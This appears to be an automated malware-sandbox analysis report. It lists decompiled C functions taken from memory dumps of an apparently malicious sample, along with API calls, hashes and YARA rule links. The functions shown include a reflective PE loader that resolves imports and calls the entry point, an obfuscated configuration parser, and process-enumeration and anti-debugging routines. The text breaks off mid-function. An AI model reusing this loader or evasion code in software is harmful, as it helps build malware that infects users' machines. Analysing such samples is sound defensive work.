Associated: 00000009.00000002.524726259.000000006ED21000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFreeHeapLast_free
String ID:
API String ID: 1353095263-0
Opcode ID: 41aab6913df6ca8b24e7c8ae1fa2843c26a8740c69af29a279557e7c9a5c858c
Instruction ID: 765d2843ce8be458106af2f7ab515de46889d4ed8a46c3c3e28a5f1a3d946d96
Opcode Fuzzy Hash: 41aab6913df6ca8b24e7c8ae1fa2843c26a8740c69af29a279557e7c9a5c858c
Instruction Fuzzy Hash: 6FC08C31010208BBCB048F81D806A8E7FB8DB802A8F200044E40017240CBB2EE009684

Uniqueness

Uniqueness Score: -1.00%

Function 0098136F, Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E0098136F(void* __eax, intOrPtr _a4) {

				 *0x983110 =  *0x983110 & 0x00000000;
				_push(0);
				_push(0x98310c);
				_push(1);
				_push(_a4);
				 *0x983108 = 0xc; // executed
				L00981746(); // executed
				return __eax;
			}

0x0098136f
0x00981376
0x00981378
0x0098137d
0x0098137f
0x00981383
0x0098138d
0x00981392

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(009813F1,00000001,0098310C,00000000), ref: 0098138D

Memory Dump Source

Source File: 00000009.00000002.517301857.0000000000981000.00000040.00020000.sdmp, Offset: 00980000, based on PE: true

Associated: 00000009.00000002.517286660.0000000000980000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.517312305.0000000000984000.00000040.00020000.sdmp Download File
Associated: 00000009.00000002.517328108.0000000000986000.00000040.00020000.sdmp Download File

Similarity

API ID: DescriptorSecurity$ConvertString
String ID:
API String ID: 3907675253-0
Opcode ID: 9b9bc2cb6eac67ea1d5c5764d17768761cfb45b48052d9ee759646e51d8f1481
Instruction ID: 1bd133405d8675f7b71e26a1bd45d46d9aa1828e5edc7bee5997a814ee72d335
Opcode Fuzzy Hash: 9b9bc2cb6eac67ea1d5c5764d17768761cfb45b48052d9ee759646e51d8f1481
Instruction Fuzzy Hash: C8C04C7415C300B6E610AB00DC5AF597A917790F05F10D508B110643D1C3F552549B19

Uniqueness

Uniqueness Score: -1.00%

Function 07F78B22, Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E07F78B22(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0x7f7d238, 0, _a4); // executed
				return _t2;
			}

0x07f78b2e
0x07f78b34

APIs

RtlFreeHeap.NTDLL(00000000,00000000,07F7131A,00000000,?,?,00000000), ref: 07F78B2E

Memory Dump Source

Source File: 00000009.00000002.523926054.0000000007F71000.00000020.00020000.sdmp, Offset: 07F70000, based on PE: true

Associated: 00000009.00000002.523909294.0000000007F70000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523948652.0000000007F7C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.523958802.0000000007F7D000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523966310.0000000007F7F000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 13a517475c8c355df6170d855fe2d62c6e7800a39353d083e20ef3001c1a1469
Instruction ID: 243286ae3517d2330531a05091c0c31100a8a48cff45127ff2d323ce80356b7b
Opcode Fuzzy Hash: 13a517475c8c355df6170d855fe2d62c6e7800a39353d083e20ef3001c1a1469
Instruction Fuzzy Hash: 40B01271200104ABCA114B60EE06F09FA21AF50B05F004014B3044417087354421FB25

Uniqueness

Uniqueness Score: -1.00%

Function 00981D7E, Relevance: 1.3, APIs: 1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00981D7E(void* __eax) {
				char _v8;
				void* _v12;
				void* __edi;
				void* _t18;
				long _t26;
				long _t29;
				intOrPtr _t40;
				void* _t41;
				intOrPtr* _t42;
				void* _t44;

				_t41 = __eax;
				_t16 =  *0x983100;
				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x983100 - 0x69b24f45 &  !( *0x983100 - 0x69b24f45);
				_t18 = E00981000( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x983100 - 0x69b24f45 &  !( *0x983100 - 0x69b24f45),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x983100 - 0x69b24f45 &  !( *0x983100 - 0x69b24f45), _t16 + 0x964da0fc,  &_v8,  &_v12); // executed
				if(_t18 != 0) {
					_t29 = 8;
					goto L8;
				} else {
					_t40 = _v8;
					_t29 = E009810E4(_t33, _t40, _t41);
					if(_t29 == 0) {
						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
						_t29 = E00981264(_t40, _t44);
						if(_t29 == 0) {
							_t26 = E00981BAE(_t44, _t40); // executed
							_t29 = _t26;
							if(_t29 == 0) {
								_push(_t26);
								_push(1);
								_push(_t40);
								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
									_t29 = GetLastError();
								}
							}
						}
					}
					_t42 = _v12;
					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
					E009817CB(_t42);
					L8:
					return _t29;
				}
			}

0x00981d86
0x00981d88
0x00981da4
0x00981db5
0x00981dbc
0x00981e1a
0x00000000
0x00981dbe
0x00981dbe
0x00981dc8
0x00981dcc
0x00981dd1
0x00981dd9
0x00981ddd
0x00981de2
0x00981de7
0x00981deb
0x00981df0
0x00981df1
0x00981df5
0x00981dfa
0x00981e02
0x00981e02
0x00981dfa
0x00981deb
0x00981ddd
0x00981e04
0x00981e0d
0x00981e11
0x00981e1b
0x00981e21
0x00981e21

APIs

Part of subcall function 00981000: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00981DBA,?,?,?,?,?,00000002,?,?), ref: 00981024
Part of subcall function 00981000: GetProcAddress.KERNEL32(00000000,?), ref: 00981046
Part of subcall function 00981000: GetProcAddress.KERNEL32(00000000,?), ref: 0098105C
Part of subcall function 00981000: GetProcAddress.KERNEL32(00000000,?), ref: 00981072
Part of subcall function 00981000: GetProcAddress.KERNEL32(00000000,?), ref: 00981088
Part of subcall function 00981000: GetProcAddress.KERNEL32(00000000,?), ref: 0098109E

Part of subcall function 009810E4: memcpy.NTDLL(00000002,?,00981DC8,?,?,?,?,?,00981DC8,?,?,?,?,?,?,?), ref: 0098111B
Part of subcall function 009810E4: memcpy.NTDLL(00000002,?,?,?,00000002), ref: 00981150

Part of subcall function 00981264: LoadLibraryA.KERNEL32(?,?,00000000,?,?), ref: 0098129C

Part of subcall function 00981BAE: VirtualProtect.KERNEL32(00000000,?,?,?,?,?,00000000,?,?), ref: 00981BE7
Part of subcall function 00981BAE: VirtualProtect.KERNEL32(00000000,?,?,?), ref: 00981C5C
Part of subcall function 00981BAE: GetLastError.KERNEL32 ref: 00981C62

GetLastError.KERNEL32(?,?), ref: 00981DFC

Memory Dump Source

Source File: 00000009.00000002.517301857.0000000000981000.00000040.00020000.sdmp, Offset: 00980000, based on PE: true

Associated: 00000009.00000002.517286660.0000000000980000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.517312305.0000000000984000.00000040.00020000.sdmp Download File
Associated: 00000009.00000002.517328108.0000000000986000.00000040.00020000.sdmp Download File

Similarity

API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
String ID:
API String ID: 2673762927-0
Opcode ID: b28dda4758c2f434c6157d742029ae7a39e2c0b2fa6d2ad7b73f6d1785d031ff
Instruction ID: 9839def56fa0aeb6ad38733fec99724d4a1fe7e3fa4ee39955ac7d48ca11e12f
Opcode Fuzzy Hash: b28dda4758c2f434c6157d742029ae7a39e2c0b2fa6d2ad7b73f6d1785d031ff
Instruction Fuzzy Hash: 1B11C876600701ABD721BB958C80DEB77BCAF887157044559FF01D7712EA60ED068790

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 07F77FBE, Relevance: 12.3, APIs: 8, Instructions: 258
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E07F77FBE(int* __ecx) {
				int _v8;
				void* _v12;
				void* _v16;
				void* __esi;
				signed int _t28;
				signed int _t33;
				signed int _t39;
				char* _t45;
				char* _t46;
				char* _t47;
				char* _t48;
				char* _t49;
				char* _t50;
				void* _t51;
				void* _t52;
				void* _t53;
				intOrPtr _t54;
				void* _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				signed int _t61;
				intOrPtr _t64;
				signed int _t65;
				signed int _t70;
				void* _t72;
				void* _t73;
				signed int _t75;
				signed int _t78;
				signed int _t82;
				signed int _t86;
				signed int _t90;
				signed int _t94;
				signed int _t98;
				void* _t103;
				intOrPtr _t121;

				_t104 = __ecx;
				_t28 =  *0x7f7d2a4; // 0x69b25f44
				if(E07F76247( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x90) {
					 *0x7f7d2d8 = _v8;
				}
				_t33 =  *0x7f7d2a4; // 0x69b25f44
				if(E07F76247( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
					_v12 = 2;
					L69:
					return _v12;
				}
				_t39 =  *0x7f7d2a4; // 0x69b25f44
				if(E07F76247( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
					L67:
					HeapFree( *0x7f7d238, 0, _v16);
					goto L69;
				} else {
					_t103 = _v12;
					if(_t103 == 0) {
						_t45 = 0;
					} else {
						_t98 =  *0x7f7d2a4; // 0x69b25f44
						_t45 = E07F79403(_t104, _t103, _t98 ^ 0x7895433b);
					}
					if(_t45 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0x7f7d240 = _v8;
						}
					}
					if(_t103 == 0) {
						_t46 = 0;
					} else {
						_t94 =  *0x7f7d2a4; // 0x69b25f44
						_t46 = E07F79403(_t104, _t103, _t94 ^ 0x219b08c7);
					}
					if(_t46 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0x7f7d244 = _v8;
						}
					}
					if(_t103 == 0) {
						_t47 = 0;
					} else {
						_t90 =  *0x7f7d2a4; // 0x69b25f44
						_t47 = E07F79403(_t104, _t103, _t90 ^ 0x31fc0661);
					}
					if(_t47 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0x7f7d248 = _v8;
						}
					}
					if(_t103 == 0) {
						_t48 = 0;
					} else {
						_t86 =  *0x7f7d2a4; // 0x69b25f44
						_t48 = E07F79403(_t104, _t103, _t86 ^ 0x0cd926ce);
					}
					if(_t48 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
							 *0x7f7d004 = _v8;
						}
					}
					if(_t103 == 0) {
						_t49 = 0;
					} else {
						_t82 =  *0x7f7d2a4; // 0x69b25f44
						_t49 = E07F79403(_t104, _t103, _t82 ^ 0x3cd8b2cb);
					}
					if(_t49 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
							 *0x7f7d02c = _v8;
						}
					}
					if(_t103 == 0) {
						_t50 = 0;
					} else {
						_t78 =  *0x7f7d2a4; // 0x69b25f44
						_t50 = E07F79403(_t104, _t103, _t78 ^ 0x2878b929);
					}
					if(_t50 == 0) {
						L41:
						 *0x7f7d24c = 5;
						goto L42;
					} else {
						_t104 =  &_v8;
						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
							goto L41;
						} else {
							L42:
							if(_t103 == 0) {
								_t51 = 0;
							} else {
								_t75 =  *0x7f7d2a4; // 0x69b25f44
								_t51 = E07F79403(_t104, _t103, _t75 ^ 0x261a367a);
							}
							if(_t51 != 0) {
								_push(_t51);
								_t72 = 0x10;
								_t73 = E07F7A0FD(_t72);
								if(_t73 != 0) {
									_push(_t73);
									E07F79FF6();
								}
							}
							if(_t103 == 0) {
								_t52 = 0;
							} else {
								_t70 =  *0x7f7d2a4; // 0x69b25f44
								_t52 = E07F79403(_t104, _t103, _t70 ^ 0xb9d404b2);
							}
							if(_t52 != 0 && E07F7A0FD(0, _t52) != 0) {
								_t121 =  *0x7f7d32c; // 0x8a295b0
								E07F71128(_t121 + 4, _t68);
							}
							if(_t103 == 0) {
								_t53 = 0;
							} else {
								_t65 =  *0x7f7d2a4; // 0x69b25f44
								_t53 = E07F79403(_t104, _t103, _t65 ^ 0x3df17130);
							}
							if(_t53 == 0) {
								L59:
								_t54 =  *0x7f7d2a8; // 0xaaa5a8
								_t22 = _t54 + 0x7f7e252; // 0x616d692f
								 *0x7f7d2d4 = _t22;
								goto L60;
							} else {
								_t64 = E07F7A0FD(0, _t53);
								 *0x7f7d2d4 = _t64;
								if(_t64 != 0) {
									L60:
									if(_t103 == 0) {
										_t56 = 0;
									} else {
										_t61 =  *0x7f7d2a4; // 0x69b25f44
										_t56 = E07F79403(_t104, _t103, _t61 ^ 0xd2079859);
									}
									if(_t56 == 0) {
										_t57 =  *0x7f7d2a8; // 0xaaa5a8
										_t23 = _t57 + 0x7f7e791; // 0x6976612e
										_t58 = _t23;
									} else {
										_t58 = E07F7A0FD(0, _t56);
									}
									 *0x7f7d340 = _t58;
									HeapFree( *0x7f7d238, 0, _t103);
									_v12 = 0;
									goto L67;
								}
								goto L59;
							}
						}
					}
				}
			}

0x07f77fbe
0x07f77fc1
0x07f77fe1
0x07f77fef
0x07f77fef
0x07f77ff4
0x07f7800e
0x07f78276
0x07f7827d
0x07f78284
0x07f78284
0x07f78014
0x07f78030
0x07f78264
0x07f7826e
0x00000000
0x07f78036
0x07f78036
0x07f7803b
0x07f78051
0x07f7803d
0x07f7803d
0x07f7804a
0x07f7804a
0x07f7805b
0x07f7805d
0x07f78067
0x07f7806c
0x07f7806c
0x07f78067
0x07f78073
0x07f78089
0x07f78075
0x07f78075
0x07f78082
0x07f78082
0x07f7808d
0x07f7808f
0x07f78099
0x07f7809e
0x07f7809e
0x07f78099
0x07f780a5
0x07f780bb
0x07f780a7
0x07f780a7
0x07f780b4
0x07f780b4
0x07f780bf
0x07f780c1
0x07f780cb
0x07f780d0
0x07f780d0
0x07f780cb
0x07f780d7
0x07f780ed
0x07f780d9
0x07f780d9
0x07f780e6
0x07f780e6
0x07f780f1
0x07f780f3
0x07f780fd
0x07f78102
0x07f78102
0x07f780fd
0x07f78109
0x07f7811f
0x07f7810b
0x07f7810b
0x07f78118
0x07f78118
0x07f78123
0x07f78125
0x07f7812f
0x07f78134
0x07f78134
0x07f7812f
0x07f7813b
0x07f78151
0x07f7813d
0x07f7813d
0x07f7814a
0x07f7814a
0x07f78155
0x07f78168
0x07f78168
0x00000000
0x07f78157
0x07f78157
0x07f78161
0x00000000
0x07f78172
0x07f78172
0x07f78174
0x07f7818a
0x07f78176
0x07f78176
0x07f78183
0x07f78183
0x07f7818e
0x07f78190
0x07f78193
0x07f78194
0x07f7819b
0x07f7819d
0x07f7819e
0x07f7819e
0x07f7819b
0x07f781a5
0x07f781bb
0x07f781a7
0x07f781a7
0x07f781b4
0x07f781b4
0x07f781bf
0x07f781cd
0x07f781d7
0x07f781d7
0x07f781de
0x07f781f4
0x07f781e0
0x07f781e0
0x07f781ed
0x07f781ed
0x07f781f8
0x07f7820b
0x07f7820b
0x07f78210
0x07f78216
0x00000000
0x07f781fa
0x07f781fd
0x07f78202
0x07f78209
0x07f7821b
0x07f7821d
0x07f78233
0x07f7821f
0x07f7821f
0x07f7822c
0x07f7822c
0x07f78237
0x07f78243
0x07f78248
0x07f78248
0x07f78239
0x07f7823c
0x07f7823c
0x07f78256
0x07f7825b
0x07f78261
0x00000000
0x07f78261
0x00000000
0x07f78209
0x07f781f8
0x07f78161
0x07f78155

APIs

StrToIntExA.SHLWAPI(00000000,00000000,?,07F730F3,?,69B25F44,?,07F730F3,69B25F44,?,07F730F3,69B25F44,00000005,07F7D00C,00000008), ref: 07F78063
StrToIntExA.SHLWAPI(00000000,00000000,?,07F730F3,?,69B25F44,?,07F730F3,69B25F44,?,07F730F3,69B25F44,00000005,07F7D00C,00000008), ref: 07F78095
StrToIntExA.SHLWAPI(00000000,00000000,?,07F730F3,?,69B25F44,?,07F730F3,69B25F44,?,07F730F3,69B25F44,00000005,07F7D00C,00000008), ref: 07F780C7
StrToIntExA.SHLWAPI(00000000,00000000,?,07F730F3,?,69B25F44,?,07F730F3,69B25F44,?,07F730F3,69B25F44,00000005,07F7D00C,00000008), ref: 07F780F9
StrToIntExA.SHLWAPI(00000000,00000000,?,07F730F3,?,69B25F44,?,07F730F3,69B25F44,?,07F730F3,69B25F44,00000005,07F7D00C,00000008), ref: 07F7812B
StrToIntExA.SHLWAPI(00000000,00000000,?,07F730F3,?,69B25F44,?,07F730F3,69B25F44,?,07F730F3,69B25F44,00000005,07F7D00C,00000008), ref: 07F7815D
HeapFree.KERNEL32(00000000,07F730F3,07F730F3,?,69B25F44,?,07F730F3,69B25F44,?,07F730F3,69B25F44,00000005,07F7D00C,00000008,?,07F730F3), ref: 07F7825B
HeapFree.KERNEL32(00000000,?,07F730F3,?,69B25F44,?,07F730F3,69B25F44,?,07F730F3,69B25F44,00000005,07F7D00C,00000008,?,07F730F3), ref: 07F7826E

Part of subcall function 07F7A0FD: lstrlen.KERNEL32(69B25F44,00000000,7748D3B0,07F730F3,07F78241,00000000,07F730F3,?,69B25F44,?,07F730F3,69B25F44,?,07F730F3,69B25F44,00000005), ref: 07F7A106
Part of subcall function 07F7A0FD: memcpy.NTDLL(00000000,?,00000000,00000001,?,07F730F3), ref: 07F7A129
Part of subcall function 07F7A0FD: memset.NTDLL ref: 07F7A138

Memory Dump Source

Source File: 00000009.00000002.523926054.0000000007F71000.00000020.00020000.sdmp, Offset: 07F70000, based on PE: true

Associated: 00000009.00000002.523909294.0000000007F70000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523948652.0000000007F7C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.523958802.0000000007F7D000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523966310.0000000007F7F000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap$lstrlenmemcpymemset
String ID:
API String ID: 3442150357-0
Opcode ID: 9a81d97d3ff54851cd3feb010b1143e7c8e2e4ccb75428ff0f0de5f8d96e4503
Instruction ID: 0ded7264c513059ee594e14296485a127daeaaacb783ef8a991596d8a22de661
Opcode Fuzzy Hash: 9a81d97d3ff54851cd3feb010b1143e7c8e2e4ccb75428ff0f0de5f8d96e4503
Instruction Fuzzy Hash: 148192F1F1020AEECB10EBB8DD89D5B76EDDF88690B6C4867E405D7204EA79D942C721

Uniqueness

Uniqueness Score: -1.00%

Function 07F78F1B, Relevance: 6.0, APIs: 4, Instructions: 41
processCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E07F78F1B() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x7f7d2a8; // 0xaaa5a8
						_t2 = _t9 + 0x7f7ee34; // 0x73617661
						_push( &_v264);
						if( *0x7f7d0fc() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}

0x07f78f26
0x07f78f30
0x07f78f34
0x07f78f3e
0x07f78f6f
0x07f78f45
0x07f78f4a
0x07f78f57
0x07f78f60
0x07f78f77
0x07f78f62
0x07f78f6a
0x00000000
0x07f78f6a
0x07f78f78
0x07f78f79
0x00000000
0x07f78f79
0x00000000
0x07f78f73
0x07f78f7f
0x07f78f84

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 07F78F2B
Process32First.KERNEL32(00000000,?), ref: 07F78F3E
Process32Next.KERNEL32(00000000,?), ref: 07F78F6A
CloseHandle.KERNEL32(00000000), ref: 07F78F79

Memory Dump Source

Source File: 00000009.00000002.523926054.0000000007F71000.00000020.00020000.sdmp, Offset: 07F70000, based on PE: true

Associated: 00000009.00000002.523909294.0000000007F70000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523948652.0000000007F7C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.523958802.0000000007F7D000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523966310.0000000007F7F000.00000002.00020000.sdmp Download File

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: bb6033eec52aad27e34ee679ef8857023d91b218432cccb5d7b0afd858635eda
Instruction ID: 7cd942149a65c3b1a8a24127777a338c981b3757fbac72310b8779b642d8385e
Opcode Fuzzy Hash: bb6033eec52aad27e34ee679ef8857023d91b218432cccb5d7b0afd858635eda
Instruction Fuzzy Hash: C5F02BB2600128AAE720B6368C4DDEBB76EDFD9755F440163E915D3100EA24CA45C7B2

Uniqueness

Uniqueness Score: -1.00%

Function 6EB16501, Relevance: 6.0, APIs: 4, Instructions: 12COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,6EB16621,6EC69448), ref: 6EB16506
UnhandledExceptionFilter.KERNEL32(6EB16621,?,6EB16621,6EC69448), ref: 6EB1650F
GetCurrentProcess.KERNEL32(C0000409,?,6EB16621,6EC69448), ref: 6EB1651A
TerminateProcess.KERNEL32(00000000,?,6EB16621,6EC69448), ref: 6EB16521

Memory Dump Source

Source File: 00000009.00000002.524101586.000000006E941000.00000020.00020000.sdmp, Offset: 6E940000, based on PE: true

Associated: 00000009.00000002.524086443.000000006E940000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.524473381.000000006EC22000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.524580245.000000006ED02000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524594907.000000006ED04000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524620642.000000006ED08000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524634112.000000006ED0A000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524650708.000000006ED0B000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524668275.000000006ED0C000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524678109.000000006ED0D000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524695130.000000006ED17000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524708028.000000006ED1C000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524726259.000000006ED21000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
String ID:
API String ID: 3231755760-0
Opcode ID: 3f8c440a21fee5d84e0060a9d9b016d0e7d8d6df408ebe1e7b2a8b3f2655c882
Instruction ID: ce8f2fe97c273125e8563f10d0207ebcc0ca59ca8dc32ebb04e6adb643c01261
Opcode Fuzzy Hash: 3f8c440a21fee5d84e0060a9d9b016d0e7d8d6df408ebe1e7b2a8b3f2655c882
Instruction Fuzzy Hash: B7D0CA72038A08AFCF082BE0DB2CA583B3CBB0A612F048800FB0A83102CA3249419B61

Uniqueness

Uniqueness Score: -1.00%

Function 6EB25F3D, Relevance: 4.6, APIs: 3, Instructions: 77COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6EB26035
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6EB2603F
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6EB2604C

Memory Dump Source

Source File: 00000009.00000002.524101586.000000006E941000.00000020.00020000.sdmp, Offset: 6E940000, based on PE: true

Associated: 00000009.00000002.524086443.000000006E940000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.524473381.000000006EC22000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.524580245.000000006ED02000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524594907.000000006ED04000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524620642.000000006ED08000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524634112.000000006ED0A000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524650708.000000006ED0B000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524668275.000000006ED0C000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524678109.000000006ED0D000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524695130.000000006ED17000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524708028.000000006ED1C000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524726259.000000006ED21000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 30d9662c351671c4044e0419dba127b97fbcc688f96ae416463d29bf3cad8f3e
Instruction ID: 527064949f2d1781829f70eb892dc6d855cebab6469dc57485eff72c353b5312
Opcode Fuzzy Hash: 30d9662c351671c4044e0419dba127b97fbcc688f96ae416463d29bf3cad8f3e
Instruction Fuzzy Hash: 3F31E674921229DBCB25DF68D9887CDBBB8FF08310F5045EAE41CA7250E7709B818F44

Uniqueness

Uniqueness Score: -1.00%

Function 6EB33A55, Relevance: 4.5, APIs: 3, Instructions: 20COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(6EB214E6,?,6EB33A54,6EB30A30,?,6EB214E6,6EB30A30,6EB214E6,00000003), ref: 6EB33A77
TerminateProcess.KERNEL32(00000000,?,6EB33A54,6EB30A30,?,6EB214E6,6EB30A30,6EB214E6,00000003), ref: 6EB33A7E
ExitProcess.KERNEL32 ref: 6EB33A90

Memory Dump Source

Source File: 00000009.00000002.524101586.000000006E941000.00000020.00020000.sdmp, Offset: 6E940000, based on PE: true

Associated: 00000009.00000002.524086443.000000006E940000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.524473381.000000006EC22000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.524580245.000000006ED02000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524594907.000000006ED04000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524620642.000000006ED08000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524634112.000000006ED0A000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524650708.000000006ED0B000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524668275.000000006ED0C000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524678109.000000006ED0D000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524695130.000000006ED17000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524708028.000000006ED1C000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524726259.000000006ED21000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: d5096a23f806cc0d316470ef96aa7c87e652d2e9814691bc03f0fd2a9bfa919b
Instruction ID: f5fcd0063895547803f7463df187868d4ef4642fbc93b005574b1bdeca6d124b
Opcode Fuzzy Hash: d5096a23f806cc0d316470ef96aa7c87e652d2e9814691bc03f0fd2a9bfa919b
Instruction Fuzzy Hash: 8EE04631030598AFCF05AB94CA2DA8D3F38FB41355B204418F8148A120CB36E982DA80

Uniqueness

Uniqueness Score: -1.00%

Function 00981264, Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00981264(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				_Unknown_base(*)()** _v16;
				signed int _v20;
				signed short _v24;
				struct HINSTANCE__* _v28;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr _t46;
				struct HINSTANCE__* _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				signed short _t51;
				_Unknown_base(*)()* _t53;
				CHAR* _t54;
				_Unknown_base(*)()* _t55;
				void* _t58;
				signed int _t59;
				_Unknown_base(*)()* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				signed int _t68;
				void* _t69;
				CHAR* _t71;
				signed short* _t73;

				_t69 = __edi;
				_v20 = _v20 & 0x00000000;
				_t59 =  *0x983100;
				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x4d92f9a0));
				if(_t43 != 0) {
					_t45 = _t43 + __edi;
					_v12 = _t45;
					_t46 =  *((intOrPtr*)(_t45 + 0xc));
					if(_t46 != 0) {
						while(1) {
							_t71 = _t46 + _t69;
							_t47 = LoadLibraryA(_t71);
							_v28 = _t47;
							if(_t47 == 0) {
								break;
							}
							_v24 = _v24 & 0x00000000;
							 *_t71 = _t59 - 0x69b25f44;
							_t49 = _v12;
							_t61 =  *((intOrPtr*)(_t49 + 0x10));
							_t50 =  *_t49;
							if(_t50 != 0) {
								L6:
								_t73 = _t50 + _t69;
								_v16 = _t61 + _t69;
								while(1) {
									_t51 =  *_t73;
									if(_t51 == 0) {
										break;
									}
									if(__eflags < 0) {
										__eflags = _t51 - _t69;
										if(_t51 < _t69) {
											L12:
											_t21 =  &_v8;
											 *_t21 = _v8 & 0x00000000;
											__eflags =  *_t21;
											_v24 =  *_t73 & 0x0000ffff;
										} else {
											_t65 = _a4;
											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
												goto L12;
											} else {
												goto L11;
											}
										}
									} else {
